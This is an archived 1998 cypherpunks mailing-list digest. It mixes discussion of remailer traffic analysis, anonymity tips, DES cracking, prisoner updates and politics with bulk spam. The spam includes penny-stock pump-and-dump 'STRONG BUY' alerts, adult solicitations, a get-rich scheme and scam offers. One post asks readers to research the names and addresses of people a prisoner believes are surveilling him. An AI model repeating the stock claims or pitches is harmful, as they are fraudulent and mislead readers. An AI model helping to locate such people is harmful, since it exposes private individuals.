    FREE Adult Offer -- Five FREE Minutes -- All LIVE

NEED A LITTLE SPICE IN YOUR LIFE?
All Your Desires Are Satisfied -- The Best LIVE CyberNet Models Do As
You Please!
ALL LIVE -- ALL DAY -- ALL NIGHT

Seductive Women:
http://www.dddbra.com/196/index.html

HardBody Hunks:
http://www.dddbra.com/215/index.html

   **   LIVE 1-on-1 Shows!
   **   MALE or FEMALE!
   **   5 FREE MINUTES of HOT ADULT LIVE ACTION!
   **   SATISFACTION GUARANTEED!

All our shows are 100% LIVE and INTERACTIVE for your enjoyment!

SEDUTIVE WOMEN That Do It ALL!
http://www.dddbra.com/196/index.html
-- OR --
HARDBODY HUNKS Give You What You Ask!
http://www.dddbra.com/215/index.html
See for yourself - We'll give you 5 FREE Steamy Minutes --
Satisfaction Guaranteed!



---------------------------------------------------------
We apologize if you received this letter in error.
Please email mailto:wjohns@tophosting.com
and we will remove you from our mailings. Thank you!
---------------------------------------------------------











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED TUE NOV 24 <stuffed@stuffed.net>
Date: Tue, 24 Nov 1998 03:08:05 -0800 (PST)
To: (100S OF FREE DAILY PICS!)
Subject: STUFFED NOW HAS LINKS TO 100S MORE PHOTOS!
Message-ID: <19981124081000.4856.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


CHECK OUT ALL THE NEW STUFF IN STUFFED!

+ DREAM GIRLS
+ BRIEN'S WORLD XXX
+ CHERRY BUSTER'S FREE XXX
+ JACK'S HOUSE OF SLUTS
+ MAIDENJUICE
+ WACK IT OFF
+ THE XXX PLACE
+ THE NUDE FILES
+ 2 PERVERSE 4 U
+ NUDE PICS
+ MUCH, MUCH MORE!

       ---->   http://stuffed.net/home/   <----

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!

       ---->   http://stuffed.net/home/   <----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Maxim Bugaenko <max@192.168.100.6>
Date: Tue, 24 Nov 1998 10:21:04 -0800 (PST)
To: cypherpunks@toad.com
Subject: unscribe
Message-ID: <365B0981.966548AE@192.168.100.6>
MIME-Version: 1.0
Content-Type: text/plain








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: K1cZS9PLE@ps.quotron.com
Date: Tue, 24 Nov 1998 21:07:29 -0800 (PST)
To: personal@touch.com
Subject: Call my Bedroom Directly ! ! ! ! ! !
Message-ID: <hF82SqJu2kXa8Wh>
MIME-Version: 1.0
Content-Type: text/plain


If you don't want me to Contact you again,
Alas, please Write me at sorry@chickmail.com
----------------------------------------------------------------------------------

Call My Bedroom Directly!!! DO it with me in MY BED!!!

CALL me NOW Before My Parents COME HOME!!!

My Phone Number is 1-664-410-3282.


Judy

(Any Guy 18 or over only, please. I don't want to get into any trouble!)
---------------------------------------------------------------------------------------

P.S.  Some of you may wanna call my brother's bedroom.
(I think he's gay, but I'm not sure.)


It's 1-664-410-4403

Call him now! BUT don't tell him you get this from me. Okay?!!!!!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Moore <CarolMoore@kreative.net>
Date: Tue, 24 Nov 1998 18:37:08 -0800 (PST)
To: "lpus-camp@dehnbase.org>
Subject: Y2K Privatization Opportunities
In-Reply-To: <273792.365B0B1E@dehnbase.org>
Message-ID: <365B6C0C.7016E77@kreative.net>
MIME-Version: 1.0
Content-Type: text/plain


Libertarians:

Whatever the extent of Y2K related problems that actually develops, there is one
thing for certain: The private sector will be up and running smoothly before much
of the government sector.  Y2K will be a fantastic opportunity to promote and
achieve privatization. So let's start planning for taking advantage of that
opportunity and stop arguing about how bad it will or will not be.

Somebody want to start the "Y2K Privatization Coalition"??

CarolMoore@kreative.net
http://www.kreative.net/carolmoore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: coins@registered-e-mail.com
Date: Wed, 25 Nov 1998 10:27:51 -0800 (PST)
To: advertiser@sosglb.com
Subject: Why should I buy Gold Coins?
Message-ID: <bulk.600.19981125173841@allegra.sosglb.com>
MIME-Version: 1.0
Content-Type: text/plain




///////////////////////////////////////////////////////////////////////////////
If you wish to be removed from our future mailings, please reply
with "Remove" in the subject header and our software will automatically
block you from our future mailings.  If you do not care for this type of advertising,
 we apologize for the intrusion.   We do, however, thank you for your time.
///////////////////////////////////////////////////////////////////////////////

Many serious investors have chosen Coins because they want not only the 
highest profit potential, but Liquidity, Security and Privacy.  The Coin 
market is free of Governmental Regulations.  By current Law, Numismatic 
Coins cannot be confiscated.  The classic Supply and Demand formula is in 
full swing with Money coming out of the Stock Market and being Directed 
into Rare Coins.  The upside potential offers Collectors and Investors the Opportunity 
to see Substantial Growth over the next 3 - 5 years.

Whether your interest is to Buy, Sell or Trade, we would like to be your 
Rare Coin & Precious Metals Dealer.  For more information, or for a free Appraisal 
and/or Newsletter, please e-mail us at coins@registered-e-mail.com with "coin info" as the Subject.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: za@fz.ml.org
Date: Sun, 29 Nov 1998 02:43:28 -0800 (PST)
To: 000mandy00@m0bey.com
Subject: Cheap Travel Service
Message-ID: <199811291036.AA20605@scooby.stat.uconn.edu>
MIME-Version: 1.0
Content-Type: text/plain



This message complies with the PROPOSED United States Federal requirements for commercial
email bill, Section 301. For additional info see: 
www.senate.gov~murkowski/commercialemail/EMailAmendText.html
Required Sender Information:SDCT,6006 Greenbelt Ed, Suite 
340, Greenbelt, MD Per Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions to 
you by the sender of this email may be stopped at no cost to you by clicking 

To be taken off our list please hit reply and
put delete as the subject.

Taking a $3.5 Trillion Industry by Storm

>>>The Demand is Outrageous
>>>The Profits are Spectular
>>>The Clients are happy.

>>>Let me show you how to Make $2-3,000 Per week to Start.

This is not MLM
>>3 Min. Overview  888 220 6954
>>3 Min. Marketing Plan 888 540 0942
>>Testimonial Line 716 720 6951
>>Fax-on-Demand  716 720-2776, Doc. 1 

For sign-up information, Send email to:
>>mailto:merchantman-info@autoresponder.freeyellow.com 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stocknews11_5_98iil@worldnet.att.net
Date: Wed, 4 Nov 1998 15:31:10 -0800 (PST)
To: smartinvestor98i@newsletterb.com
Subject: RE: URGENT BUY ALERT!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company:  Mark I Industries
Symbol:   M K I I   (mkii)
Price:    1/4  ($.25/share)

M K I I  has announced an affiliation with one of 
their subsidiaries and AT&T.  Management projects
a $100 million revenue goal at their current rate
of growth with "the company's stock to trade in
the $4 range".

M K I I is rated an immediate and "STRONG BUY".
For more information on  M K I I go to:
http://quote.yahoo.com











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hugh Daniel <hugh@road.toad.com>
Date: Thu, 12 Nov 1998 12:58:32 -0800 (PST)
To: cypherpunks-announce@toad.com
Subject: ANNOUNCE: SATURDAY Bay Area Cypherpunks Meeting - Stanford University
Message-ID: <199811122056.MAA15098@road.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


The November Cypherpunks Meeting will be Saturday 11/14 from 1-5pm
at Stanford, at the tables outside Tresidder Union, near the bookstore.
The tables are on the west side, which is the inside of the U-shape.  
Coffee and food are available in the building. 
If the weather is uncooperative, we will also be inside the building.

Lucky Green will be talking about his latest work.
Hugh Daniel will update us on the new alpha of Linux FreeS/WAN.

Bagels and Bagel Parephrenalia will be provided.

Directions to Stanford Tresidder Hall
	Stanford is between El Camino Real and Junipero Serra Blvd,
	which are between 101 and 280.  The Tresidder Parking Lot
	is on Mayfield Ave, off Campus Drive East.

http://www.stanford.edu/home/map/search_map.html?keyword=&ACADEMIC=Tresidder+Union
http://www.stanford.edu/home/map/stanford_zoom_map.html?234,312

The upside-down map of Stanford&Vicinity is at
http://www.stanford.edu/home/visitors/vicinity.html

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 01143572@amdiscount.net
Date: Sat, 14 Nov 1998 14:53:29 -0800 (PST)
To: Friend@public.com
Subject: Confidential Scanner Service
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


CONFIDENTIAL SCANNING SERVICE

First item scanned $5.00. Second item scanned $4.00.  Each additional item scanned $3.00

We will scan and send file to your e-mail address within 24 hours after receipt.
If you would like your photo returned you must enclose a self addressed and stamped envelope

Files should be checked as soon as possible for your satisfaction. All photos received without directions for return will be destroyed after 10 days
We accept Master Card ,Visa, Cash or Money Order  (no checks) 
Required Information

E-mail address_____________________

Save as _________________File (Gif or JPEG) for the web or (TIF) for artwork.

Required information for mature or adult photos

I AM 18 YEARS OF AGE OR OVER AND THERE ARE NO PERSONS IN THESE PHOTOS UNDER 18 YEARS OF AGE.

Signed by:____________________________________________

Required information for credit card

MC_____ Visa_____  Card #________________________Expiration_____________

Name of cardholder____________________________________________________

Address _____________________________________________________________

City_______________________________ST_________ZIP________________

Mail form and payment or payment information to:
American Discount Services
8515 Douglas Suite 32
Des Moines, IA  50322

For additonal information call 515-270-9651





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stockmarketupdate1998iktrmjy@mci.com
Date: Sun, 15 Nov 1998 23:51:16 -0800 (PST)
To: hsmartinvestor@aol.com
Subject: RE: MAJOR "BUY" ALERT
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Internet Stock Market Resources
Symbol:  I S M R
Price:   1 3/4  ($1.75/share)

The venerated German brokerage house, Bentegestgautgen
Financials has issued a "STRONG BUY" on I S M R
with a target price of  $8.50.

I S M R is the leader of financial on-line information
and is currently profitable.  I S M R has a public float of only
300,000 shares.  For more information on I S M R go to: 
http://quicken.excite.com/investments/quotes/






ctl.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strongintstock4j3s@mci.com
Date: Tue, 17 Nov 1998 06:57:32 -0800 (PST)
To: smarket@snewsletter.net
Subject: RE:  "SIZZLER" INTERNET STOCK!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Quest Net Corp.
Symbol:  Q N E T D
Price:  2 1/2  ($2.50/share)

QNETD is a provider of global Internet and
Intranet digital networking solutions.  QNETD
has strategic alliances with MCI WorldCom, 
BellSouth Corp. and PSINet, among others.

QNETD's business model, according to independent
analysts, is projected for unprecedented exponential
growth.  QNETD is rated an immediate and "STRONG
BUY". 

For more information go to:  http://quote.yahoo.com






gg.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strongmarketstock75bbn@worldnet.att.net
Date: Sat, 21 Nov 1998 15:14:06 -0800 (PST)
To: smartinvestor1a@newsletter1a.net
Subject: RE:  "SIZZLER" INTERNET STOCK!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Quest Net Corp.
Symbol:  Q N E T D
Price:  3  1/2  ($3.50/share)

QNETD is a provider of global Internet and
Intranet digital networking solutions.  QNETD
has strategic alliances with MCI WorldCom, 
BellSouth Corp. and PSINet, among others.

QNETD's business model, according to independent
analysts, is projected for unprecedented exponential
growth.  QNETD is rated an immediate and "STRONG
BUY". 

For more information go to:  http://quote.yahoo.com





ggi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strongmarketstock75bbn@worldnet.att.net
Date: Sun, 22 Nov 1998 02:08:19 -0800 (PST)
To: smartinvestor1a@newsletter1a.net
Subject: RE:  "SIZZLER" INTERNET STOCK!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Quest Net Corp.
Symbol:  Q N E T D
Price:  3  1/2  ($3.50/share)

QNETD is a provider of global Internet and
Intranet digital networking solutions.  QNETD
has strategic alliances with MCI WorldCom, 
BellSouth Corp. and PSINet, among others.

QNETD's business model, according to independent
analysts, is projected for unprecedented exponential
growth.  QNETD is rated an immediate and "STRONG
BUY". 

For more information go to:  http://quote.yahoo.com





ggi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: marketnewstoday11_24_98iilli@worldnet.att.net
Date: Mon, 23 Nov 1998 15:29:03 -0800 (PST)
To: investor0018@stck_news.com
Subject: RE: "SIZZLER" INTERNET STOCK!  .
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Company: Quest Net Corp.
Symbol:  Q N E T
Price:  3  1/2  ($3.50/share)

QNET is a provider of global Internet and
Intranet digital networking solutions.  QNET
has strategic alliances with MCI WorldCom, 
BellSouth Corp. and PSINet, among others.

QNET's business model, according to independent
analysts, is projected for unprecedented exponential
growth.  QNET is rated an immediate and "STRONG
BUY". 

For more information go to:
http://quicken.excite.com/investments/quotes










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Dec 1998 08:35:08 +0800
To: cypherpunks@toad.com
Subject: Re: Old Hat 2
Message-ID: <199811302325.AAA15856@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Here's what is likely going on right now, though its
availability to LE is questionable:

NSA probably maintains surveillance of all or nearly all
encrypted remailers. They log and archive the content of
all traffic. First arrivals of messages in the remailer
"cloud" provide source identification in many cases, so
a database is gradually built of all the originating
email addresses and IP addresses that have ever sent
messages to a remailer. The same is true for the messages
exiting the cloud, although many of those go to public
lists or newsgroups. Sometimes, perhaps even often, the
remailer cloud is so little utilised that one-hop or even
multi-hop chained remalings are easily identified as to
source and final destination. All goes into the database.
Spook-style stylometers develop profiles of the users.
Over time, more and more of the unidentified profiles
become linked to known users. All it takes is one slip,
or one piece of bad luck of low traffic levels. Linkage
is also done on a probabilistic basis, many-to-many.
Little human intervention is used except to develop and
tune the correlation mechanisms. Filters aimed at content
that might help correlate messages with senders is more 
important to the spooks than Echelon Dictionary filters.
The priorities in getting a handle on something like the
remailer cloud are quite different than the priorities in
scanning ordinary traffic for content. Ultimately, though,
the regular content filters come into play, but in this
ongoing exercise of cat and mouse, the bulk of the effort
is directed at developing the combination of surveillance
and intelligent processing that can provide the basis for
identifying, at least to some knowable probability, the
sources and destinations of given remailer messages.

Source and destination correlation can benefit greatly
from knowledge of conventional email correspondent 
relationships. Most nonprofessional-spook people who send 
encrypted remailed email to a non-public destination are 
also likely to correspond with that destination in the 
clear. Archival logging of traffic is like a time machine -
even if one ceases conventional correspondence with
another, any past traffic can reveal the correspondence
relationship.

Mathematical correlation, given a very large amount of raw
data consisting of timestamped message events, can reveal
quite a lot about likely correspondence relationships.
Even given a remailer network full of chaff, with reordered
message pools and such, just running correlations on the
end point data - who sent and when, and who received and when
- can develop likely correspondent pairs.

Be assured that the manipulation of such data relies heavily
on probablistic clustering supported by database mechanisms
not seen much in business environments. Instead of having
firm relationships within an order or two of magnitude of
the terminal node population, I would want something that
allows having very large numbers of fuzzy relationships
numbering many orders of magnitude greater than the node
population. Nodes A, B, C and D send and receive remailer
traffic. Everything that A has ever sent is clearly
related to A, but each item can and likely would also
have a probabilistic relationship to B, C, and D. The
probability assignments would be updated as later analysis
and later data more clearly identify who may have received 
which messages. Content comes into play here, too.

At any time it is possible to query the database for
the likely correspondents of A, and the likely messages
A may have sent to B, C, or D, and get a result ordered
by confidence. Similarly, it is possible to query for
the likely sender(s) and recipient(s) of a given message.
Occasionally, data may be firmed up - meaning achieving 
higher confidence levels of the relationships - by access 
to someone's PC, by whatever means, by stylometry, by 
specific content of public messages, and by fortuitous 
traffic analysis successes owing to the paucity of remailer 
traffic.

It's also certain that to provide realistic cases that can
be fully revealed to measure the efficacy of the various
algorithms and methods involved, spooks use the remailer
network themselves. That's the only way they can be sure
to have any traffic that can be fully analyzed as a yardstick
for the guessing games played by their software.

A few rules of thumb result from even cursory examination
of the likely environment:

1. Do not send clear messages through the remailers 
   except to public lists and newsgroups. Sending clear
   messages to private correspondents provides the 
   watchers with rich style and content material linked
   to a correspondent. It is usually easy then to link
   it back to you, and a firm correspondent pair is then
   established in their database.

2. Do not switch between clear and encrypted, remailed 
   communication with the same correspondent. If your
   correspondent relationships are mapped via clear,
   conventional mail, those mappings can be applied to
   your encrypted, remailed mail to greatly narrow 
   down the possible recipients, and quite likely 
   combine with traffic analysis to correlate your
   outgoing message with one arriving at your
   correspondent. If the only communications you have
   with your deep contacts is by encrypted, chained
   remailer, only fortuitous or statistical correlation
   analysis or access to your or your correspondent's
   host machines will tie the two of you together.

3. Do not send traffic to significant correspondents
   when traffic levels are likely to be low. Good
   luck at guessing this. Probably the best way to
   get a handle on traffic levels is to run a remailer
   yourself.

4. Send lots of chaff. Chain some messages through the
   remailer cloud every day. If you have time and the
   ability, write and release something that will allow
   large numbers of people to send lots of chaff.

5. Ultimately, the only way the remailers will provide
   what might be described as Pretty Good Security will
   be when we have software that maintains a regular
   or random rate of messages to and from the remailer
   cloud, a stream into which the meaningful messages
   can be inserted with no visible change in traffic.
   Until then, the best we can do is try to keep traffic
   levels up, and to send and receive frequently enough
   to frustrate end-to-end traffic analysis.

6. Don't send anything that can have grave consequences.

7. Take names. Always take names. Some day...

FUDBusterMonger

It Ain't FUD til I SAY it's FUD!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel Popescu" <mdpopescu@geocities.com>
Date: Tue, 1 Dec 1998 07:29:15 +0800
To: "HaB" <cypherpunks@toad.com>
Subject: Re: more FUD!
Message-ID: <001701be1cb2$85869a20$LocalHost@DEVELOP>
MIME-Version: 1.0
Content-Type: text/plain




-----Original Message-----
From: HaB <hab@gamegirlz.com>
To: <cypherpunks@toad.com>
Date: mari, 01 decembrie 1998 01:46
Subject: Re: more FUD!


>First time poster.  Been reading for awhile now and I feel like a goof
>for having to ask, but what does FUD stand for anyway?

Fear, Uncertainty, Doubt. Alleged technique of large companies to make
people think twice before buying products from lesser companies by casting
doubt over the reliability of the product and its creator. Thinking twice is
known to be a Bad Thing. <g>

Mark







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Cypherpunk <carolann@censored.org>
Date: Tue, 1 Dec 1998 16:54:21 +0800
To: cypherpunks@Algebra.COM
Subject: New Brady Bill Implications
Message-ID: <3.0.2.32.19981201022809.00743bf4@pop.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I'm watching Headline News, and they are reporting
that "now", under new provisions in the Brady Bill,
and 'instant' background check is being made. This
even is for simple rifles and shotguns.

Just think, soon there might be 'instant' background
checks, even just to use simple 56 bit DES. Or somewhere
lurking around in your browser code, a teeny tiny program
that sends a cookie to the NSA, FBI, etc every time you
use crypto. Who knows, it's probably there already.

Or a realtime NCIS check to buy a copy of PGP! Wild!

cab8
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0
Comment: PGP 6.0 is the "The Living End".

iQA/AwUBNmOomDiM2656VXArEQLQRQCgg3l0PO8DOzkj/7McAUI8gQSC03cAnRhk
AybC39FkOKoV7ZQUvJcuFTT8
=9sxR
-----END PGP SIGNATURE-----

Member Internet Society  - Certified Mining Co. Guide  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.165.50.96
http://www.primenet.com/~carolab
http://www.ozones.com/~drozone - The Cyberdoc
***********************************************************************
Will lobby Congress for Food & Expenses!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Dec 1998 10:34:50 +0800
To: cypherpunks@toad.com
Subject: student project suggestion; PGP trap and trace
Message-ID: <199812010207.DAA22493@replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Given: if the adversary captures your PGP keyring, he
will know your contacts.  Your secure contacts.  

Therefore: it would be mighty nice if access to your
keyring's address list required a passphrase (which
perhaps was valid for several hours, it being a pain
to retype a decent passphrase).

You will note that the PGP plugins for Eudora allow
any buffoon with access to your machine to discover
who you talk to securely.

--Laced aliens fried my pugs











  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Dec 1998 11:27:36 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199812010220.DAA25133@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject: naughty bits


At 12:25 AM 12/1/98 +0100, Anonymous wrote:
>NSA probably maintains surveillance of all or nearly all
>encrypted remailers. They log and archive the content of

Well shit yes, I pay enough taxes, you bet they do, or I'm
not getting my fucking dollars worth.

I only send via anon when I care only about the honest readers'
opinion.  Like I'd send dangerous shit over the IP.  May
as well fax it plaintext to the Ukraine.  Bwah hah hah.

If you were really going to pull a prank, you'd create
a one-shot yahoo/hotmail/etc account from a cafe then
wipe that platter clean (both FAT and lean).

---If your Correlators have pegged me, well, hello.  Nice game.
















  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 1 Dec 1998 11:52:21 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: No Subject
Message-ID: <199812010320.EAA00631@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Perhaps of interest to locals...


                EE380 Computer Systems Colloquium

                      Fall Quarter 1998-1999

                          Lecture #10


Date:           Wednesday, Dec 2, 1998

Time:           4:15-5:30 pm

Location:       NEC Auditorium (B03)
                Gates Computer Science Building

Internet:       Live on the Net!  See instructions on the Web page
                http://www-leland.stanford.edu/class/ee380

  **********************************************************************

Title:          Cracking the Data Encryption Standard: 
                Technology, Design, and Politics

Speaker:        John Gilmore
                The Electronic Frontier Foundation

About the talk:

Sometimes it takes good engineering to straighten out twisted politics.  

In 1997, working in conjunction with the Electronic Frontier Foundation, 
John Gilmore decided to demonstrate this by building a custom computer 
that would be able to solve the Data Encryption Standard, an encoding 
scheme the United States Government had been promoting for "secure" 
business and financial communications since the 1970s.  

It had long been suspected the Government was pressing citizens to use 
this standard because its intelligence agencies were secretly able to 
decode DES-encrypted messages.  It appears this theory was right.  
DES *was* crackable -- easily and affordably -- which Mr. Gilmore 
demonstrated in July, 1998 by using his "DES Cracker" system to solve in 
less than three days a coded message that had been produced as part of a 
DES-decryption contest.  

In this presentation Mr. Gilmore will discuss the design of the DES 
Cracker system and explain some of the politics surrounding the DES 
controversy.  

Note:  A full description of the DES Cracker system, including complete 
hardware and software design details, appears in the book, "Cracking 
DES: Secrets of Encryption Research, Wiretap Politics, & Chip Design," 
published by O'Reilly.  Further details can also be found at:

          http://www.eff.org/descracker/ 

About the speaker:

John Gilmore is an entrepreneur and civil libertarian.  He was an early 
employee of Sun Microsystems, and co-founded Cygnus Solutions, the 
Electronic Frontier Foundation (EFF), the Cypherpunks, and the 
Internet's "alt" newsgroups.  He has twenty-five years of experience in 
the computer industry, including programming, hardware and software 
design, management, and investment, and is a significant contributor to 
the worldwide open source (free software) development effort.  

Mr. Gilmore's advocacy efforts on encryption policy aim to improve 
public understanding of this fundamental technology for privacy and 
accountability in open societies.  He led the team that built, in 
conjunction with the EFF, the world's first published DES Cracker.  He 
is a board member of the Internet Society and the Electronic Frontier 
Foundation.  

Further background information may be found at: 

          http://www.cygnus.com/~gnu/ 


Contact information:

John Gilmore
gnu@toad.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 1 Dec 1998 19:32:40 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Jim Bell Update
Message-ID: <199812011101.GAA14156@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Forward No. 1 (11/30/98):

Jim has been back in the Seattle/Tacoma jail for about a week & 1/2, 
after a stop-over in Oklahoma City.   Not doing much, but is glad to be 
back because he likes the food better and he has things to do, unlike 
in Springfield.

He doesn't know what the schedule is for his stay at this point, except 
that there is an attempt to impose more time to his sentence, which he 
says by the time they accomplish anything in court he will have fulfilled 
anyway.

He requests once again that anyone who would like to help him research
the names/addresses of people he thinks are involved in the surveillance 
efforts against him, to please contact him.

His address again is:

	James Bell #26906086
    Federal Detention Center
    P.O. Box 68976
    Seattle WA 98168

----------

Forward No. 2 (11/30/98):

After spending several weeks in Oklahoma, then several more in 
Springfield, MO, a shrink interviewed Jim for a total of six hours, and 
said he could find nothing wrong that they could help with.  After 
several more weeks in Springfield, it was back to Oklahoma, for a 
couple more weeks, and now he is finally back at Sea-Tac.

He reports that the prosecutor is asking for 9 months for violation 
of parole, which would mean Jim might be released in 3 months.  
He is on Prozac and seems in pretty good spirits.  Opinions seem 
unchanged.

----------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 1 Dec 1998 19:32:49 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: CJ Update
Message-ID: <199812011102.GAA10440@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Forward (11/26/98):

They moved CJ from Springfield on the 18th. He is in Oklahoma City 
awaiting  movement supposedly next week. I talked with him and he 
sounded okay. He would like to receive copies of what has been written 
and posted about him. He doen't know  where he is going. His lawyer 
should find out next week.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Tue, 1 Dec 1998 16:22:45 +0800
To: cypherpunks@Algebra.COM
Subject: somebody clue this person in please!
Message-ID: <cf30a8115b91e9bd4bb4be28a8fe5287@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Ken Williams <jkwilli2@unity.ncsu.edu> wrote:

>i'm laughing too damned hard to do it myself.

>In a message dated 11/30/98 10:15:50 AM EST, jkwilli2@unity.ncsu.edu writes:
>
>> Get Your Private, Free, Encrypted Email at http://www.nsa.gov
>
>I looked around there site and couldnt find anything about geting a e-mail
>could you please be more specific.

Why do you find this such a surprise? This is typical behavior for 
AOLholes. We've all tried for years to clue such lamers in, and all 
we've ever gotten in return are more "solicited" spam, and more unsolicited 
spam, and it's worse because they're no longer concentrated at one site.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Wed, 2 Dec 1998 04:17:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: New Brady Bill Implications
In-Reply-To: <3.0.2.32.19981201022809.00743bf4@pop.primenet.com>
Message-ID: <v04003a00b289da243335@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/plain



>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>I'm watching Headline News, and they are reporting
>that "now", under new provisions in the Brady Bill,
>and 'instant' background check is being made. This
>even is for simple rifles and shotguns.

How does this affect private, that is non-dealer, gun sales (like at swap
meets)?

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 1 Dec 1998 17:10:12 +0800
To: cypherpunks@cyberpass.net
Subject: Re: SternFUD on RSA
In-Reply-To: <199812010235.UAA19311@wire.insync.net>
Message-ID: <3663AB6D.7ABCE704@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Eric Cordian wrote:

> > 3. The court didn't uphold a patent on applied math; it upheld a
> > process patent on a crypto system that, among other things, uses
> > applied math. So does almost any engineering design.
> 
> There is a fundamental difference between a physical machine whose
> design required the use of mathematics, and an abstract mathematical
> transformation, which may exist only in an instance of some computer
> program performing a certain task.

I am not taking part in this debate but simply like to point to the
fact that the creteria of what is patentable appear to be undergoing
some change. One illustrative example is that DNA sequences can
currently be patented as far as I know.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 1 Dec 1998 23:45:02 +0800
To: Bill Stewart <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
In-Reply-To: <366086B6.2E880D74@brd.ie>
Message-ID: <199812011458.JAA13450@mail1.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:22 PM 11/29/98 -0500, Bill Stewart wrote:
>Yeah - it can be quite nice to do that, both for security and speed.
>Hugh Daniel's done some work on making Unix run on systems with 
>read-only root drives - there are some SCSI drives which support
>read-only mode again, and there are PCMCIA flash cards which have
>write-protect switches and look like disks to the OS, 
>so you can set them up the way you want and then go to read-only.

Unix has been ported to memory only systems including the Palm OS (using
virtual drives) but you can't do much with it at this point.

http://ryeham.ee.ryerson.ca/uClinux/

"The Linux/Microcontroller project is a port of the Linux 2.0 to systems
without a Memory Management Unit. At present, only Motorola MC68000
derivatives are supported. The first target system to sucessfully boot is
the 3Com PalmPilot with a TRG SuperPilot Board and a custom boot loader
they put together specifically for the Linux/PalmPilot port. Thanks guys!"

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 2 Dec 1998 04:29:07 +0800
To: nobody@replay.com (Anonymous)
Subject: Re: NZ or LA in Y2K
In-Reply-To: <199812011551.QAA03245@replay.com>
Message-ID: <199812011651.KAA07541@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Anonymous wrote:
> At 07:54 PM 11/30/98 -3000, Igor Chudov @ home wrote:
> >
> >But objectively, there is a large category of people who are bored
> >with their current lifestyle and gleefully expect a "total breakdown"
> >of the society so that they could shoot live man sized targets instead
> >of boring paper targets.
> >
> >They are likely to be disappointed by Y2K, or so I expect. (again,
> >my expectation that social breakdown is not likely to happen does
> >not preclude me from reasonable preparations)
> 
> When the power goes out, the rioting and looting starts
